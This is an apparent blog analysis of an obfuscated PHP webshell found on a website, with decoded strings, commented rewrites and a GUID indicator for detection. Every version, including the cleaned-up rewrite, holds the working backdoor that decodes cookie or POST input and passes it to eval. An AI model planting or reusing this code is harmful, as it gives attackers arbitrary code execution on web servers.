一段 PHP 木马（webshell 后门）分析


网站上被人挂了木马,拿下来分析下吧.

源代码

<?php
// NOTE(review): this is a PHP backdoor (webshell), not a "virus". Everything below is
// decoded further down the page (see the var_dump): $hqpnhcc ends up as
//   ["H*", "#", "6971ce3b-63a9-4558-9488-a96a53605bb4", "count", "str_repeat",
//    "explode", "substr", "array_merge", "strlen", "pack"]
// For every cookie and POST value it: hex-decodes the value (pack "H*"), XORs it with a
// keystream made of (parameter name . fixed GUID) repeated, splits the result on "#",
// and when the number of parts is a multiple of 3 runs eval($parts[1]($parts[2])) and
// exits -- i.e. arbitrary code execution with an attacker-chosen decoder callable
// (presumably something like base64_decode). The fixed GUID string above is the most
// useful signature/IOC; the single-character-index assembly exists only to defeat
// simple string matching. Do not execute outside an isolated analysis environment.
$wyfxfq = '0vktmocuneiy#gr9ldx1\'b_-p45H*sa8736';$hqpnhcc = Array();$hqpnhcc[] = $wyfxfq[27].$wyfxfq[28];$hqpnhcc[] = $wyfxfq[12];$hqpnhcc[] = $wyfxfq[34].$wyfxfq[15].$wyfxfq[32].$wyfxfq[19].$wyfxfq[6].$wyfxfq[9].$wyfxfq[33].$wyfxfq[21].$wyfxfq[23].$wyfxfq[34].$wyfxfq[33].$wyfxfq[30].$wyfxfq[15].$wyfxfq[23].$wyfxfq[25].$wyfxfq[26].$wyfxfq[26].$wyfxfq[31].$wyfxfq[23].$wyfxfq[15].$wyfxfq[25].$wyfxfq[31].$wyfxfq[31].$wyfxfq[23].$wyfxfq[30].$wyfxfq[15].$wyfxfq[34].$wyfxfq[30].$wyfxfq[26].$wyfxfq[33].$wyfxfq[34].$wyfxfq[0].$wyfxfq[26].$wyfxfq[21].$wyfxfq[21].$wyfxfq[25];$hqpnhcc[] = $wyfxfq[6].$wyfxfq[5].$wyfxfq[7].$wyfxfq[8].$wyfxfq[3];$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[22].$wyfxfq[14].$wyfxfq[9].$wyfxfq[24].$wyfxfq[9].$wyfxfq[30].$wyfxfq[3];$hqpnhcc[] = $wyfxfq[9].$wyfxfq[18].$wyfxfq[24].$wyfxfq[16].$wyfxfq[5].$wyfxfq[17].$wyfxfq[9];$hqpnhcc[] = $wyfxfq[29].$wyfxfq[7].$wyfxfq[21].$wyfxfq[29].$wyfxfq[3].$wyfxfq[14];$hqpnhcc[] = $wyfxfq[30].$wyfxfq[14].$wyfxfq[14].$wyfxfq[30].$wyfxfq[11].$wyfxfq[22].$wyfxfq[4].$wyfxfq[9].$wyfxfq[14].$wyfxfq[13].$wyfxfq[9];$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[16].$wyfxfq[9].$wyfxfq[8];$hqpnhcc[] = $wyfxfq[24].$wyfxfq[30].$wyfxfq[6].$wyfxfq[2];foreach ($hqpnhcc[7]($_COOKIE, $_POST) as $yzduqsm => $qwjfg){function zzukwhs($hqpnhcc, $yzduqsm, $hpuzb){return $hqpnhcc[6]($hqpnhcc[4]($yzduqsm . $hqpnhcc[2], ($hpuzb / $hqpnhcc[8]($yzduqsm)) + 1), 0, $hpuzb);}function udrbgpm($hqpnhcc, $ywknbu){return @$hqpnhcc[9]($hqpnhcc[0], $ywknbu);}function emjluei($hqpnhcc, $ywknbu){$qkmplfc = $hqpnhcc[3]($ywknbu) % 3;if (!$qkmplfc) {eval($ywknbu[1]($ywknbu[2]));exit();}}$qwjfg = udrbgpm($hqpnhcc, $qwjfg);emjluei($hqpnhcc, $hqpnhcc[5]($hqpnhcc[1], $qwjfg ^ zzukwhs($hqpnhcc, $yzduqsm, $hqpnhcc[8]($qwjfg))));}
?>

第一部分：拼接字符串（从一个字符集里逐个字符拼出函数名、分隔符和密钥）

<?php
// 字符集
// Character set: every string the shell needs is assembled from single characters
// of this alphabet, so none of the function names appear literally in the file.
$wyfxfq = '0vktmocuneiy#gr9ldx1\'b_-p45H*sa8736';

$hqpnhcc = Array();

// Clearly assembling the strings it needs. The decoded value of each element
// (confirmed by the var_dump output below) is noted on the right.
$hqpnhcc[] = $wyfxfq[27].$wyfxfq[28]; // [0] "H*"  -> pack() format: hex string to raw bytes
$hqpnhcc[] = $wyfxfq[12]; // [1] "#"   -> explode() delimiter
$hqpnhcc[] = $wyfxfq[34].$wyfxfq[15].$wyfxfq[32].$wyfxfq[19].$wyfxfq[6].$wyfxfq[9].$wyfxfq[33].$wyfxfq[21].$wyfxfq[23].$wyfxfq[34].$wyfxfq[33].$wyfxfq[30].$wyfxfq[15].$wyfxfq[23].$wyfxfq[25].$wyfxfq[26].$wyfxfq[26].$wyfxfq[31].$wyfxfq[23].$wyfxfq[15].$wyfxfq[25].$wyfxfq[31].$wyfxfq[31].$wyfxfq[23].$wyfxfq[30].$wyfxfq[15].$wyfxfq[34].$wyfxfq[30].$wyfxfq[26].$wyfxfq[33].$wyfxfq[34].$wyfxfq[0].$wyfxfq[26].$wyfxfq[21].$wyfxfq[21].$wyfxfq[25]; // [2] "6971ce3b-63a9-4558-9488-a96a53605bb4" -> fixed key material; best IOC to search for
$hqpnhcc[] = $wyfxfq[6].$wyfxfq[5].$wyfxfq[7].$wyfxfq[8].$wyfxfq[3]; // [3] "count"
$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[22].$wyfxfq[14].$wyfxfq[9].$wyfxfq[24].$wyfxfq[9].$wyfxfq[30].$wyfxfq[3]; // [4] "str_repeat"
$hqpnhcc[] = $wyfxfq[9].$wyfxfq[18].$wyfxfq[24].$wyfxfq[16].$wyfxfq[5].$wyfxfq[17].$wyfxfq[9]; // [5] "explode"
$hqpnhcc[] = $wyfxfq[29].$wyfxfq[7].$wyfxfq[21].$wyfxfq[29].$wyfxfq[3].$wyfxfq[14]; // [6] "substr"
$hqpnhcc[] = $wyfxfq[30].$wyfxfq[14].$wyfxfq[14].$wyfxfq[30].$wyfxfq[11].$wyfxfq[22].$wyfxfq[4].$wyfxfq[9].$wyfxfq[14].$wyfxfq[13].$wyfxfq[9]; // [7] "array_merge"
$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[16].$wyfxfq[9].$wyfxfq[8]; // [8] "strlen"
$hqpnhcc[] = $wyfxfq[24].$wyfxfq[30].$wyfxfq[6].$wyfxfq[2]; // [9] "pack"

/******************** !! var_dump to see what was assembled  ************/
var_dump($hqpnhcc);
/******************** !! var_dump to see what was assembled  ************/

?>

第一处var_dump输出如下

array(10) {
  [0]=> string(2) "H*"
  [1]=> string(1) "#"
  [2]=> string(36) "6971ce3b-63a9-4558-9488-a96a53605bb4"
  [3]=> string(5) "count"
  [4]=> string(10) "str_repeat"
  [5]=> string(7) "explode"
  [6]=> string(6) "substr"
  [7]=> string(11) "array_merge"
  [8]=> string(6) "strlen"
  [9]=> string(4) "pack"
}

第二部分

<?php
// $hqpnhcc[7] = array_merge: every cookie and every POST field is a candidate
// payload (cookies first; same-named string keys are overridden by POST).
// NOTE(review): the three functions are declared *inside* the loop body. PHP
// declares such functions at runtime when the line is reached, so a second
// iteration would presumably hit a "Cannot redeclare" fatal error -- in practice
// only the first merged entry is ever tried unless it triggers the eval/exit.
foreach ($hqpnhcc[7]($_COOKIE, $_POST) as $yzduqsm => $qwjfg){
    // Keystream: substr(str_repeat($name . GUID, $len / strlen($name) + 1), 0, $len)
    // [6] = substr, [4] = str_repeat, [2] = the fixed GUID, [8] = strlen
    function zzukwhs($hqpnhcc, $yzduqsm, $hpuzb){
        return $hqpnhcc[6]($hqpnhcc[4]($yzduqsm . $hqpnhcc[2], ($hpuzb / $hqpnhcc[8]($yzduqsm)) + 1), 0, $hpuzb);
    }
    // Hex decode: @pack("H*", $value); the '@' hides pack() warnings on non-hex input
    // [9] = pack, [0] = "H*"
    function udrbgpm($hqpnhcc, $ywknbu){
        return @$hqpnhcc[9]($hqpnhcc[0], $ywknbu);
    }
    // Trigger: [3] = count. If the number of '#'-separated parts is a multiple of 3,
    // run eval($parts[1]($parts[2])) -- $parts[1] is used as a callable name, $parts[2]
    // as its argument -- then exit. WARNING: eval on attacker-controlled data.
    function emjluei($hqpnhcc, $ywknbu){
        $qkmplfc = $hqpnhcc[3]($ywknbu) % 3;
        if (!$qkmplfc) {
            eval($ywknbu[1]($ywknbu[2]));
            exit();
        }

    }
    // value -> hex decode -> XOR with keystream of the same length ([8] = strlen)
    // -> explode on "#" ([5] = explode, [1] = "#") -> trigger check
    $qwjfg = udrbgpm($hqpnhcc, $qwjfg);
    emjluei($hqpnhcc, $hqpnhcc[5]($hqpnhcc[1], $qwjfg ^ zzukwhs($hqpnhcc, $yzduqsm, $hqpnhcc[8]($qwjfg))));
}

重写下这段代码

  1. 对着前面数组内容翻译一下这段代码
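// Step 1: same structure as the sample, with every $hqpnhcc[N] replaced by the
// string the var_dump above showed it to be. Where a function no longer needs
// the array, it is dropped from BOTH the signature and the call site -- the
// earlier translation dropped it only from the signatures, so udrbgpm() and
// zzukwhs() were still being handed the array where a string was expected.
foreach (array_merge($_COOKIE, $_POST) as $yzduqsm => $qwjfg){
    // Keystream of $hpuzb bytes: (parameter name . fixed GUID) repeated, then cut.
    function zzukwhs($yzduqsm, $hpuzb){
        return substr(str_repeat($yzduqsm . "6971ce3b-63a9-4558-9488-a96a53605bb4", ($hpuzb / strlen($yzduqsm)) + 1), 0, $hpuzb);
    }
    // Hex-decode the incoming value; '@' hides pack() warnings on non-hex input.
    function udrbgpm($ywknbu){
        return @pack("H*", $ywknbu);
    }
    // Trigger: when the '#'-separated part count is a multiple of 3, run
    // eval($parts[1]($parts[2])) and stop the request.
    // WARNING: eval on attacker-controlled data -- this is the backdoor itself.
    function emjluei($ywknbu){
        $qkmplfc = count($ywknbu) % 3;
        if (!$qkmplfc) {
            eval($ywknbu[1]($ywknbu[2]));
            exit();
        }
    }
    $qwjfg = udrbgpm($qwjfg);
    emjluei(explode("#", $qwjfg ^ zzukwhs($yzduqsm, strlen($qwjfg))));
}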
  2. 替换变量名，去掉 $hqpnhcc，把三个函数移出循环，调整结构。还原之后逻辑就很清楚了：对每个 Cookie/POST 值先做 hex 解码，再与「参数名 + 固定 GUID」生成的密钥流逐字节异或，按 # 切分，段数是 3 的倍数时执行 eval($段[1]($段[2])) 并退出，也就是任意代码执行后门。那串固定的 GUID 字符串是最可靠的检测/排查特征。
/**
 * Keystream generator for the XOR "decryption" of a payload.
 *
 * Key material is the request parameter name followed by the hard-coded GUID;
 * it is repeated enough times to cover $value bytes and then cut to exactly
 * $value bytes. Because the GUID is fixed in the sample, it is the most
 * reliable string to search for / alert on.
 *
 * @param string $key   parameter (cookie/POST) name; a zero-length name would divide by zero
 * @param int    $value number of keystream bytes wanted
 * @return string       keystream of length $value (empty when $value is 0)
 */
function zzukwhs($key, $value){
    $material = $key . "6971ce3b-63a9-4558-9488-a96a53605bb4";
    // Repeat count is a float here (plain division), coerced to int by str_repeat.
    $repeats = ($value / strlen($key)) + 1;
    $stream = str_repeat($material, $repeats);
    return substr($stream, 0, $value);
}

/**
 * Hex-decode an incoming value into raw bytes.
 *
 * The payload travels as a hex string so it survives cookie/form encoding.
 * The '@' suppresses pack() warnings on non-hex input, which keeps the shell
 * quiet on ordinary requests.
 *
 * @param string $value hex-encoded payload
 * @return string       decoded bytes
 */
function udrbgpm($value){
    $bytes = @pack("H*", $value);
    return $bytes;
}

/**
 * Trigger stage of the backdoor.
 *
 * $elements is the '#'-split plaintext. When its element count is a multiple
 * of 3 (3, 6, 9, ...) the shell runs eval($elements[1]($elements[2])) --
 * $elements[1] is used as a callable name (presumably a decoder such as
 * base64_decode) and $elements[2] as its argument -- and terminates the
 * request. Any other count is ignored, so normal traffic never reveals it.
 *
 * WARNING: eval() on attacker-controlled input == arbitrary code execution.
 * Kept verbatim for analysis only; never deploy.
 *
 * @param array $elements parts produced by explode("#", ...)
 * @return void           (does not return at all when the trigger fires)
 */
function emjluei($elements){
    if (count($elements) % 3 !== 0) {
        return;
    }
    eval($elements[1]($elements[2]));
    exit();
}

// Entry point: every cookie and every POST field is a candidate payload
// (array_merge lists cookies first; a POST field with the same string name
// overrides the cookie). For each one: hex-decode, XOR with the keystream
// derived from the parameter name, split on '#', hand the parts to the trigger.
$candidates = array_merge($_COOKIE, $_POST);
foreach ($candidates as $key => $value) {
    $value = udrbgpm($value);
    $keystream = zzukwhs($key, strlen($value));
    $parts = explode("#", $value ^ $keystream);
    emjluei($parts);
}

